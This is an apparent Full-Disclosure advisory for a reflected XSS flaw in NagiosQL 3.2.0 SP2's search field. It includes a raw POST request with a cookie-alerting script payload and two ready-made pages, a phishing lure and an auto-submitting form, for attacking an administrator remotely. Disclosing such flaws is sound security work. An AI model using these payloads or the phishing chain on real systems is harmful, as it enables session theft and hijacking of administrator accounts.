Reflected XSS Attacks XSS vulnerabilities in NagiosQL 3.2.0 Servicepack 2 (CVE: CVE-2013-6039)

[William Costa <william.costa () gmail com>]

I. VULNERABILITY
-------------------------
Reflected XSS Attacks XSS vulnerabilities in NagiosQL 3.2.0 Servicepack 2

II. BACKGROUND
-------------------------
NagiosQL is a web based administration tool designed for Nagios, but might also work with forks. It helps you to easily 
build a complex configuration with all options, manage and use them. NagiosQL is based on a webserver with PHP, MySQL 
and local file or remote access to the Nagios configuration files.

III. DESCRIPTION
-------------------------
Has been detected a Reflected XSS vulnerability in NagiosQL in all pages that containing input for search, that allows 
the execution of arbitrary HTML/script code to be executed in the context of the victim user's browser.

The code injection is done through the parameter "txtSearch" in all pages

IV. PROOF OF CONCEPT
-------------------------
The application does not validate the parameter “txtSearch” correctly.

Malicious Request ("txtSearch")
Vulnerable:
POST /nagiosql/admin/hostdependencies.php HTTP/1.1
Host: 10.0.1.120
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: 
pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate
Referer: http://10.0.1.120/nagiosql/admin/hostdependencies.php Cookie: PHPSESSID=hhr9lv77k9d4vvh0cauco48206
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 198

txtSearch=aaaa%22%2F%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2F 
script%3E&modus=checkform&hidModify=&hidListId=&hidLimit=0&hidSortBy=1 
&hidSortDir=ASC&hidSort=0&selModify=none&selTargetDomain=1HTTP/1.1 200 OK

Date: Wed, 30 Oct 2013 16:15:34 GMT
Server: Apache/2.2.16 (Debian)
X-Powered-By: PHP/5.3.3-7+squeeze17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre- check=0

Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 3440
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/htmlV.
BUSINESS IMPACT
-------------------------
An attacker can execute arbitrary HTML or script code in a targeted user's browser, this can leverage to steal 
sensitive information as user credentials, personal data, etc.

VI. SYSTEMS AFFECTED
-------------------------
  NagiosQL test only 3.2.0 Servicepack 2
`
VII. SOLUTION
-------------------------
All data received by the application and can be modified by the user, before making any kind of transaction with them 
must be validated .

After click in search.
VIII. REMOTE EXPLOIT
-----------------------------
Are two pages an that user access and another contains code for send via post the XSS

Send phishing email For administrator for a page with follow code: Name: page.html

<html>
<body>
<H1>BLAH BLAH BLAH</H1>
<p>Your bases are not belong to me, dun worry bro</p>
<? if (isset($_GET["done"])) {
die();
}?><iframe src="http://yoursite.com/xss/index.php"; width="1" height="1" frameborder="0"></iframe>
</body>
</html>

Name: index.php
<html>
<head>
<style>
.xss {display: none;
}
</style>
</head>
<body onload="XSS.submit();">
<form id="xss" action="http://sitevictim/nagiosql/admin/hosts.php"; method="post" name="XSS">
<input name="txtSearch" value=""><script>alert(document.cookie);</script>"</input>

</form>
</body>
</html>

BY
F3nr1r (William Costa)
william.costa () gmail com




REFERENCES



http://cwe.mitre.org/data/definitions/79.html

http://www.nagiosql.org/

http://www.nagiosql.org/forum8/solved-issues/3270-security-hotfix-for-%20nagiosql-3-2-sp2.html#3690

 

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/